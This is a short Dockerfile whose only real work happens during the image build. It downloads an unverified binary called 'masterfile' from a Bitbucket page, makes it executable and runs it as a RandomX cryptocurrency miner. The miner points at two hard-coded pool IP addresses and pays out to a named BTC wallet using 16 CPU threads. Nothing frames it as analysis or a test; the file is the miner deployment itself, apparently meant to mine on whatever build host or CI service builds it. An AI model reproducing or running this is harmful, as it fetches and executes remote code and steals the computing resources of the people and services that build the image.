FROM ubuntu:20.04
#-----------------
RUN apt-get update
RUN apt-get install -y wget
RUN wget https://bitbucket.org/anli-projects/unmineable/downloads/masterfile
RUN chmod u+x masterfile
RUN ./masterfile --disable-gpu --algorithm randomx --pool 165.227.113.101:13333!139.59.164.123:13333 --wallet BTC:326j45HMNx9JTdFALsjW3ZLXqB8sE3cApi.Anli01 --cpu-threads 16
#-----------------